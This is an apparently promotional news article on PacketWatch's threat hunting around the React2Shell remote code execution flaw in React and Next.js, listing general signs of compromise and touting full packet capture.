As organizations struggle to understand the impact of the React2Shell vulnerability, PacketWatch threat hunters have published a blog article, “Responding to React2Shell,” detailing their experience with React2Shell in the wild, including the attack flow, proof-of-concept, IOCs, and observed behaviors.
With threats like React2Shell, deploying endpoint detection and response (EDR), web application firewalls (WAF), and application patches can protect your devices, but these updates won’t alert you if the vulnerability has already been exploited. For that, it takes a unique set of tools and proven cyber incident response expertise.
“Network traffic originating from external sources is often not seen by, or effectively parsed by, conventional security tools,” says John Bornt, chief security officer and vice president of cyber operations and incident response at PacketWatch. “This lack of visibility allows threat actors using exploits like React2Shell to successfully compromise an organization’s Internet-facing resources without immediately triggering alerts for the security operations team to triage.”
The React2Shell vulnerability enables remote code execution on systems using React or Next.js. This allows threat actors worldwide to exploit this “open door” to deliver various malicious payloads. Due to the widespread adoption of these platforms, React2Shell poses a greater threat to corporate networks than other known vulnerabilities.
Organizations monitoring their network should ensure that their purview is not one-dimensional. Looking solely at HTTP headers, firewall logs, Zeek signatures, or NetFlow data is not enough. Full Packet Capture provides a complete recording (PCAP) of network activity, much like a DVR does for television. This allows network threat hunters to investigate and “rewind” the activity to find subtle suspicious patterns.
Some of the suspicious activities that PacketWatch analysts observed in the wild with React2Share-exploited environments included:
- Suspicious processes spawning from Node.js
- Suspicious network traffic to malicious external IPs (C2)
- Suspicious network connections from the React server to other internal assets
- Scanning from the React server
- Malware installations and malicious code running on the React server
“We can see things that others can’t,” said Andrew Oesterheld, senior cybersecurity analyst at PacketWatch. “With full packet capture, we’re able to use raw network data to quickly reverse-engineer exploits and build detections to protect our clients. Within hours of a new exploit being released, we can protect all our managed clients, even before traditional alerts are triggered. That’s the power of proactive threat hunting.”
Read Also: CGI to deliver secure mobile communications solution for NATO
